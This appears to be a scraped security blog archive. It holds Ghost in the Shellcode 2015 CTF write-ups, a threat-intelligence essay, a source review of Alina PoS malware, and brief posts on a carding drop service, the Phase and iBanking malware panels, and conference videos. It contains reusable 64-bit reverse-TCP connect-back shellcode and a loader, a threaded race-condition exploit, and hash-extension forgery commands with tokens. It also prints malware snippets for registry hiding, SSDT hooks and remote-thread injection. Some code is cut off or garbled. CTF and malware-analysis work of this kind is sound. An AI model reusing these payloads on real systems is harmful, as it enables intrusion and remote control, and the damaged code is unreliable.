Then I just convert the shellcode into a bunch of bytecode operators / operands, which will be the entirety of the fourth bytecode function (I'm proud to say that this code worked on the first try):

  # Pad the shellcode to the proper length
  shellcode = SHELLCODE
  while((shellcode.length % 26) != 0)
    shellcode += "\xCC"
  end

  # Now we create a new function, which simply stores the actual shellcode.
  # Because this is a known offset, we can copy it to the +rwx memory with
  # a loader
  ops = []

  # Break the shellcode into 26-byte chunks (the size of an operation)
  shellcode.chars.each_slice(26) do |slice|
    # Make the character array into a string
    slice = slice.join

    # Split it into the right proportions
    a, b, c, d = slice.unpack("SQQQ")

    # Add them as a new operation
    ops << create_op(a, b, c, d)
  end

  # Add the operations to a new function (no offset, since we just need to
  # get it stored, not run as bytecode)
  add(s, ops, 16)

And, for good measure, here's my 64-bit connect-back shellcode:

# Port 17476, chosen so I don't have to think about endianness at 7am at night :)
REVERSE_PORT = "\x44\x44"


# Simple reverse-tcp shellcode I always use
SHELLCODE = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +
"\x02" + REVERSE_PORT + "\xc7\x44\x24\x04" + REVERSE_ADDR + "\x48\x89\xe6\x6a\x10" +
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +

It's slightly modified from some code I found online. I'm mostly just including it so I can find it again next time I need it. :)


To summarize everything...

There was an off-by-one vulnerability in the verifyBytecode() function. I used that to break out of the sandbox and run unverified bytecode.

That bytecode allowed me to read/write/execute arbitrary memory. I used it to leak the base address of the binary, the base address of the register array (where my reads/writes are relative to), and the address of some +RWX memory.

I copied loader code into that +RWX memory, then ran it. It copied the next bytecode function, as actual machine code, to the +RWX memory.

Then I got a shell.

Hope that was useful!

GitS 2015: aart.php (race condition)

Welcome to my second writeup for Ghost in the Shellcode 2015! This writeup is for the one and only Web level, "aart" (download it). I wanted to do a writeup for this one specifically because, even though the level isn't super exciting, the solution was actually a pretty obscure vulnerability type that you don't generally see in CTFs: a race condition!

But we'll get to that after, first I want to talk about a wrong path that I spent a lot of time on. :)

The wrong path

If you aren't interested in the trial-and-error process, you can skip this section—don't worry, you won't miss anything useful.

I like to think of myself as being pretty good at Web stuff. I mean, it's a large part of my job and career. So when I couldn't immediately find the vulnerability on a small PHP app, I felt like a bit of an idiot.

I immediately noticed a complete lack of cross-site scripting and cross-site request forgery protections, but those don't lead to code execution so I needed something more. I also immediately noticed an auth bypass vulnerability, where the server would tell you the password for a chosen user if you simply try to log in and type the password incorrectly. I also quickly noticed that you could create multiple accounts with the same name! But none of that was ultimately helpful (except the multiple accounts, actually).

Eventually, while scanning code over and over, I noticed this interesting construct in vote.php:

if($type === "up"){
        $sql = "UPDATE art SET karma=karma+1 where id='$id';";
} elseif($type === "down"){
        $sql = "UPDATE art SET karma=karma-1 where id='$id';";
}

mysqli_query($conn, $sql);

Before that block, $sql wasn't initialized. The block doesn't necessarily initialize it before it's used. That led me to an obvious conclusion: register_globals (aka, "remote administration for Joomla")!
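For anyone who never had the "pleasure": register_globals auto-created a PHP variable from every request parameter, so an attacker could pre-seed $sql before the if/elseif ever ran. A rough Python analogue of the bug class (my own sketch, not the challenge code):

```python
def vote(params):
    # register_globals effectively did this: request parameters become
    # local variables, including ones the code never meant to accept
    sql = params.get('sql')  # attacker-controlled "initial" value!

    if params.get('type') == 'up':
        sql = "UPDATE art SET karma=karma+1"
    elif params.get('type') == 'down':
        sql = "UPDATE art SET karma=karma-1"

    # If neither branch matched, the attacker's value is what gets executed
    return sql
```

With `type` set to anything other than "up" or "down", the attacker-supplied `sql` parameter survives untouched.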

I tried a few things to test it, but because the result of mysqli_query isn't actually used and errors aren't displayed, it was difficult to tell what was happening. I ended up setting up a local version of the challenge on a Debian VM just so I could play around (I find that having a good debug environment is a key to CTF success!)

After getting it going and turning on register_globals, and messing around a bunch, I found a good query I could use:'1'

That worked on my test app, so I confidently strode to the real app, ran it, and... nothing happened. Rats. Back to the drawing board.

The real vulnerability

So, the goal of the application was to obtain a user account that isn't restricted. When you create an account, it's immediately set to "restricted" by this code in register.php:

        $username = mysqli_real_escape_string($conn, $_POST['username']);
        $password = mysqli_real_escape_string($conn, $_POST['password']);

        $sql = "INSERT into users (username, password) values ('$username', '$password');";
        mysqli_query($conn, $sql);

        $sql = "INSERT into privs (userid, isRestricted) values ((select id from users where username='$username'), TRUE);";
        mysqli_query($conn, $sql);
} else {

Then on the login page, it's checked using this code:

        $username = mysqli_real_escape_string($conn, $_POST['username']);

        $sql = "SELECT * from users where username='$username';";
        $result = mysqli_query($conn, $sql);

        $row = $result->fetch_assoc();

        if($_POST['username'] === $row['username'] and $_POST['password'] === $row['password']){
                <h1>Logged in as <?php echo($username);?></h1>

                $uid = $row['id'];
                $sql = "SELECT isRestricted from privs where userid='$uid' and isRestricted=TRUE;";
                $result = mysqli_query($conn, $sql);
                $row = $result->fetch_assoc();
                        <h2>This is a restricted account</h2>

                        <h2><?php include('../key');?></h2>


} else {

My gut reaction for far too long was that it's impossible to bypass that check, because it only selects rows where isRestricted=true!

But after fighting with the register_globals non-starter above, I realized that if there were no matching rows in the privs database, it would return zero results and the check would pass, allowing me access! But how to do that?

I went back to the user creation code in register.php and noticed that it creates the user first, then restricts it! There's a lesson for programmers: secure by default.

$sql = "INSERT into users (username, password) values ('$username', '$password');";
mysqli_query($conn, $sql);

$sql = "INSERT into privs (userid, isRestricted) values ((select id from users where username='$username'), TRUE);";
mysqli_query($conn, $sql);

That means, if you can create a user account and log in immediately after, before the second query runs, then you can successfully get the key! But I didn't notice that till later, like, today. I actually found another path to exploitation! :)
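The race window can be modeled in a few lines. This toy sketch (entirely my own, not the challenge code) shows why a login that lands between the two INSERTs sees an unrestricted account:

```python
users = {}  # username -> password
privs = {}  # username -> isRestricted

def register_step1(name, password):
    users[name] = password            # INSERT into users

def register_step2(name):
    privs[name] = True                # INSERT into privs (the restriction)

def login_is_restricted(name):
    # Mirrors login.php: if the privs query returns no rows,
    # the "restricted" check passes and the key is printed
    return privs.get(name, False)

register_step1("ron", "hunter2")           # first query has run...
race_won = not login_is_restricted("ron")  # ...login lands in the window
register_step2("ron")                      # ...the restriction arrives too late
```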

My exploit

This is where things get a little confusing....

I first noticed there's a similar vulnerability in the code that inserts the account restriction into the privs table. There's no logic in the application to prevent the creation of multiple user accounts with the same name! And, if you create multiple accounts with the same name, it looked like only the first account would ever get restricted.

That was my reasoning, anyways (I don't think that's actually true, but that turned out not to matter). However, on login, only the first account is actually retrieved from the database! My thought was, if you could get those two SQL statements to run concurrently, so they run intertwined between two processes, it might just put things in the right order for an exploit!

Sorry if that's confusing to you—that logic is flawed in like every way imaginable, I realized afterwards, but I implemented the code anyways. Here's the main part (you can grab the full exploit here):

require 'httparty'

#TARGET = ""

name = "ron" + rand(100000).to_s(16)


t1 = do
  response ="#{TARGET}/register.php", :body => { :username => name, :password => name })
end

t2 = do
  response ="#{TARGET}/register.php", :body => { :username => name, :password => name })
end

t1.join()
t2.join()

I ran that against my test host and checked the database. Instead of failing miserably, like it by all rights should have, it somehow caused the second query (the INSERT into privs) to fail entirely! I attempted to log in as the new user, and it gave me the key on my test server.

Honestly, I have no idea why that worked. If I ran it multiple times, it worked somewhere between 1/2 and 1/4 of the time. Not bad, for a race condition! It must have caused a silent SQL error or something, I'm not entirely sure.

Anyway, I then tried running it against the real service about 100 times, with no luck. I tried running one instance, and a bunch in parallel. No deal. Hmm! From my home DSL connection, it was slowwwwww, so I reasoned that maybe there was just too much lag.

To fix that, I copied the exploit to my server, which has high bandwidth (thanks to SkullSpace for letting me keep my gear there :) ) and ran the same exploit, which worked on the first try! That was it, I had the flag.


I'm not entirely sure why my exploit worked, but it worked great (assuming decent latency)!

I realize this challenge (and story) aren't super exciting, but I like that the vulnerability was due to a race condition. Something nice and obscure, that we hear about and occasionally fix, but almost never exploit. Props to the GitS team for creating the challenge!

And also, if anybody can see what I'm missing, please drop me an email ron @ and I'll update this blog. I approve all non-spam comments, eventually, but I don't get notifications for them at the moment.

GitS 2015: knockers (hash extension vulnerability)

As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote :) ))

The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name :) ).

You can download the original level here (Python).

The vulnerability

To track down the vulnerability, let's have a look at the signature algorithm:

def generate_token(h, k, *pl):
        m = struct.pack('!'+'H'*len(pl), *pl)
        mac = h(k+m).digest()
        return mac + m

In that function, h is a hash function (sha-512, specifically), k is a random 16-byte secret stored on the server, and m is a packed array of 16-bit representations of the ports that the user wishes to open. So if the user wanted to open ports 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below).
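So the token layout is simply a 64-byte SHA-512 MAC followed by the packed ports. A quick sketch of both sides (only generate_token is from the challenge; the verify helper is my own reconstruction of what the server logically does):

```python
import hashlib
import struct

def generate_token(key, *ports):
    m = struct.pack('!' + 'H' * len(ports), *ports)
    return hashlib.sha512(key + m).digest() + m

def verify_token(key, token):
    mac, m = token[:64], token[64:]   # sha-512 digests are 64 bytes
    return hashlib.sha512(key + m).digest() == mac

key = b'A' * 16                       # stand-in for secret.txt
token = generate_token(key, 80)       # 64-byte MAC + "\x00\x50"
```

Note the server log later shows "len 66": that's the 64-byte MAC plus one 16-bit port.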

Hmm... it's generating a MAC-protected token by concatenating a secret with the message and hashing it? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability!

I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of msg + H(secret + msg), the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port!
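Concretely, the extended message is the original data, plus the "glue" padding SHA-512 would have appended internally, plus your new data; hash_extender computes exactly this (it's the "New string" in its output). Here's a sketch of the padding math for our 16-byte secret (my own illustration, not part of the challenge or the tool):

```python
def sha512_glue_padding(msg_len):
    """The padding SHA-512 appends internally: 0x80, zero bytes up to
    16 bytes short of a 128-byte block boundary, then the bit length
    as a 128-bit big-endian integer."""
    pad = b'\x80'
    pad += b'\x00' * ((128 - (msg_len + 1 + 16)) % 128)
    pad += (msg_len * 8).to_bytes(16, 'big')
    return pad

secret_len = 16
data = bytes.fromhex('0050')    # port 80 (the signed message)
append = bytes.fromhex('1c07')  # port 7175 (what we want to add)
new_string = data + sha512_glue_padding(secret_len + len(data)) + append
```

That's why the server later logs a pile of junk ports: the padding bytes get parsed as 16-bit port numbers too.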

Let's see how!

Generating a legit token

To use the python script linked above, first run 'setup':

$ python ./ setup
wrote new secret.txt

Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's:

$ cat secret.txt

Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80:

$ python ./ newtoken 80

Notice the first 512 bits (64 bytes) are the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works!

We start the server:

$ python ./ serve

And in another window, or on another host if you prefer, send the generated token:

$ python ./ knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

In the original window, you'll see that it was successful:

$ python ./ serve
Client: ::1 len 66
allowing host ::1 on port 80

Now, let's figure out how to create a token for port 7175!

Generating an illegit (non-legit?) token

So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack!

Download and compile hash_extender if needed (it definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x50"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (16 bytes). You also need to pass in the types for each of the parameters ("hex") where the defaults don't match (in this case, the appended data is assumed to be raw).

All said and done, here's the command:

./hash_extender --data-format hex --data 0050 \
  --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \
  --append "1c07" --append-format hex \
  -l 16

You can pass in the algorithm and the desired output format as well; if you don't, it'll output a result for every hash type with a 512-bit signature (hence the whirlpool entry below). The output defaults to hex, so we're happy with that.

$ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16
Type: sha512
Secret length: 16
New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894
New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Type: whirlpool
Secret length: 16
New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659
New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them:

$ python ./ knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

And checking our server, we see a ton of output, including successfully opening port 7175:

$ python ./ serve
Client: ::1 len 66
allowing host ::1 on port 80
Client: ::1 len 178
allowing host ::1 on port 80
allowing host ::1 on port 32768
allowing host ::1 on port 0
allowing host ::1 on port 0
[...repeated like 100 times...]
allowing host ::1 on port 0
allowing host ::1 on port 0
allowing host ::1 on port 144
allowing host ::1 on port 7175

And that's it! At that point, you can visit and get the key.


This is a pure hash extension vulnerability, which required no special preparation—the hash_extender tool, as written, was perfect for the job!

My favourite part of that is looking at my traffic graph on github:

It makes me so happy when people use my tool, it really does!

Beyond the Buzzwords: Why You Need Threat Intelligence

I dislike buzzwords.

Let me be more precise -- I heavily dislike when a genuinely useful term is commandeered by the army of marketing people out there and promptly loses any real meaning. It makes me crazy, as it should make you, when a term devised to describe some new method, utility, or technology becomes virtually meaningless because everyone uses it to mean everything and nothing all at once. Being in a highly dynamic technical field is hard enough without having to play thesaurus games with the marketing people. They always win anyway.

So when I see things like the post "7 Security buzzwords that need to be put to rest", on one hand I'm happy someone is out there taking the over-marketing and over-hyping of good terms to task, but on the other hand I'm apprehensive, left wondering whether we've thrown the baby out with the bath-water.

In this case, if you look at slide 8, Threat Intelligence, you have this quote:
"This is a term that has been knocked about in the industry for the last couple of years. It really amounts to little more than a glorified RSS feed once you peel back the covers for most offerings in the market place."

I'm unsure whether the author was going for irony or sarcasm, or has simply never seen a good Threat Intelligence feed before -- but this is just categorically wrong. Publishing this kind of thing is irresponsible, and does a disservice to the reading public who take these words for truth from a journalist.

Hyperbole and Irony

Let's be honest, there are plenty of threat intelligence feeds that match that definition. I can think of a few I'd love to tell you about but non-disclosure agreements make that impractical. Then there are those that provide a tremendous amount of value when they are properly utilized at the proper point in time, by the proper resources.

Take for example a JSON-based feed of validated, known-bad IP addresses from one of the many providers of this type of data. I would hardly call this intelligence, but rather reputational data in the form of a feed. Sure, this is consumed much like you would an RSS feed of news -- except that the intent is typically automated consumption by tools and technologies that require very little human intervention.

Is the insinuation here that this type of thing has little value? I would agree that in the grand scheme of intelligence a list of known-bad IP addresses has a very short shelf-life and a complicated utility model which is necessarily more than a binary decision of "good vs. bad" -- but this does not completely destroy its utility to the security organization. Take for example a low-maturity organization that is understaffed and relies heavily on network-based security devices to protect its assets. Incorporating a known-bad (IP reputation) feed into its currently deployed network security technologies may be more than a simple added layer of security. This may in fact be an evolution, but one that only a lower-level security organization can appreciate.

My point is, don't throw away the potential utility of something like a reputation feed without first considering the context within which it will be useful.

Without Intelligence, We're Blind

I don't know how to make this more clear. After spending a good portion of the last 4 months studying successful and operational security programs I can't imagine a scenario where a security program without the incorporation of threat intelligence is even viable. I'm sorry to report that without a threat-intelligence focused strategy, we're left deploying the same old predictable patterns of network security, antivirus/endpoint and other static defenses which our enemies are well attuned to and can avoid without putting much thought into it.

While I agree the marketing organizations at the big vendors (and small, to be fair) have all but ruined the reputation of the phrase threat intelligence, I dare you to run a successful security program without understanding your threats and adversaries and still be successful at efficient detection and response. Won't happen.

I guess I'm biased since I've spent so much time researching this topic that I'm now what you may consider a true believer. I can sleep well knowing that thorough (and ongoing) research into successful security programs which incorporate threat intelligence leads me to conclude that threat intelligence is essential to an effective and focused enterprise security program. I'm still not an expert, but at least I've seen it both succeed and fail and can tell the difference.

So why the hate? Let's ideate

I get it, security people are experiencing fatigue from buzzwords and terms taken over by marketing people, which makes our ears bleed every time someone starts making less than no sense. I get it, I really do. But let's not throw the baby out with the bathwater. Let's not dismiss something that has the potential to transform our security programs into something relevant to today's threats just because we're sick of hearing talking heads misuse and abuse the term.

I also get that when terms are over-hyped and misused it does everyone an injustice. Is an IP reputation list threat intelligence? I wouldn't call it that -- it's just data. There are hallmarks of threat intelligence that make it useful and much more than just a buzzword:

  1. it's actionable
  2. it's complete
  3. it's meaningful
Once you have these characteristics in your threat intelligence "feed", you have significantly more than just an RSS feed. You have something that can act as a catalyst for a security program stuck in the 90's. Let's not let our pull to be snarky get the best of us and throw away a perfectly legitimate term. Instead, let's take those who misuse and abuse the term and call them out for their disservice to our mission.

Alina ‘sparks’ source code review

I recently got my hands on the source code of Alina "sparks". The main 'improvement' that everyone is talking about, and that makes the price of this malware rise, is the rootkit feature.
Josh Grunzweig already did an interesting coverage of a sample, but what is this new version worth?

InjectedDLL.c from the source is a copy-paste of some Chinese code, commented out and replaced with two kernel32 hooks instead, as if the author can't into hooks :D
A comment is still in Chinese, as you can see on the screenshot.

+ this:
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
{
    LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
    if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)
        Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
    return Result;
}


// Registry Value Hiding
Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext);
Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);
So many stupid mistakes in the code: no sanity checks in the hooks, nothing stable.
I haven't looked at a sample in the wild, but I doubt it works at all.
The actual rootkit source (the body is stored as a hex array; the PDB path is c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap.

This x86-32 driver is responsible for SSDT hooking of NtQuerySystemInformation, NtEnumerateValueKey, and NtQueryDirectoryFile.
The driver is ridiculously simple:
  DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc;

BOOL SetHooks()
{
  if ( !NtQuerySystemInformationOrig )
    NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);
  if ( !NtEnumerateValueKeyOrig )
    NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);
  if ( !NtQueryDirectoryFileOrig )
    NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);
  return TRUE;
}

All of them hide the 'windefender' target: its process, file, and registry entries.
void InitStrings()
{
  RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderRegistryString, L"windefender");
}
It's the malware's name; Josh also pointed in this direction in his analysis.
First submitted on VT on 2013-10-17 17:27:10 UTC (1 year, 2 months ago).

Overall, that DLL seems unused; the Alina project uses the driver I mentioned.
As for the project itself, it's still an awful piece of student lab work. Here is some of the log just from an attempt to compile:
If SHGetSpecialFolderPath returns FALSE, the strcat to SourceFilePath happens anyway.

Two copy-pasted methods with the same mistake: leaking the process information handle pi.hProcess.

Using hKey from a failed function call:
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L,  KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {

pThread could be NULL; this is checked before WriteProcessMemory but not before CreateRemoteThread:
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten);
HANDLE ThreadHandle =  CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);

Reading invalid data from hdr->hwid, where hwid is declared as char hwid[8]: the readable size is 8 bytes, but 18 bytes may be read:
memcpy(outkey, hdr->hwid, 18);

realloc might return a null pointer: assigning it straight back to buf, the same pointer that was passed to realloc, leaks the original memory block on failure:

The prior call to strncpy might not zero-terminate the string Result:

The return value of ReadFile is ignored; if it fails anywhere, the code works on garbage since the cmd variable is never initialized:

Signed/unsigned mismatch:

Unreferenced local variable hResult:

Using TerminateThread does not allow proper thread cleanup:

Now, regarding 'edits', Sparks made some, for example the pipes, mutexes, user-agents and the process blacklist, but most of these edits are minor things that anybody can do to 'customise' his own bot.
In no case can that count as a code addition or something 'new'.
As for the panel... well, it's like the bot: nothing changed at all.
It's still the same ugly design, still the same files with the same modification timestamps, no code additions, still the same cookie-auth crap as if the coder can't use sessions in PHP, and so on...

To conclude, the main 'improvement' is a copy-pasted rootkit that doesn't work. I don't know how many bad guys bought this source for $1k or more, but it's definitely not worth it.
Overall it's a good example of how people can take some code, announce a rootkit to impress, and play everything on malware notoriety.
This reminds me of the guys who announced IceIX on malware forums, when the samples turned out to be just a basic ZeuS with broken improvements.

Hi Benson.

Tiberium/Consuella USPS money laundering service

Consuella was a 'USPS drop service' run by one of the Lampeduza administrators.
This type of service helps credit card thieves "cash out" by shipping parcels with carded USPS labels overseas (or not).
They were also constantly recruiting mules in the United States to keep addresses in rotation.

Here is what the service looks like from an admin's point of view:

Add a payment:




Consuella was incredibly simple compared to other drop-shipping services such as and , which had fake websites for mules on the panel.

Phase (Win32/PhaseBot-A)

A small write-up about 'Phase', a malware which appeared and vanished very rapidly.
I had a look at it with MalwareTech, who wrote several stories on it; it was shown that Phase is in reality a 'new' version of Solar bot. At least, not so new: the code is so copy-pasted that antivirus products such as Avast even produce false positives and now detect Napolar (Solar) as PhaseBot.


Phase support website:

The coder is using a public snippet for chatting with customers:
So weak that it's even vulnerable to XSS.

Master balance? Less than $1k.
Phase seems not so popular, and it also got rapidly lynched by other actors on forums.

Anyway, let's have a look at the web panel.








Analyzer detector:





In-the-wild panel, with RAM scraper plugin + VNC:

RAM scraper plugin:

Remote-controlled point-of-sale:

Another botnet with a hacked, remote-controlled point-of-sale:

Wallet stealer:

Phase samples:

Unencrypted RAM scraper plugin: 1e18ee52d6f0322d065b07ec7bfcbbe8
Unencrypted VNC plugin: 94eefdce643a084f95dd4c91289c3cf0
Panel: c43933e7c8b9d4c95703f798b515b384 (with a small Trend Micro signature fail, "PHP_SORAYA.A"; no, this is not the Soraya panel)
Needless to say, the panel was also vulnerable.


iBanking is an Android malware made to intercept voice and text information.
The panel is poorly coded.



Phone list:

SMS List:

All SMS (Incoming):

All SMS (Outgoing):

Call list (Incoming):

Call list (Outgoing):

Call list (Missed):


Contact list:

Url report:

Video archives of security conferences and workshops

Just some links for your enjoyment

List of security conferences in 2014

Video archives:

AIDE (Appalachian Institute of Digital Evidence)

Chaos Communication Congress
Digital Bond's S4x14
Circle City Con
GrrCON Information Security Summit & Hacker Conference
Hack in the box HITB
Heidelberg Germany
Workshops, How-tos, and Demos

Special thanks to Adrian Crenshaw for his collection of videos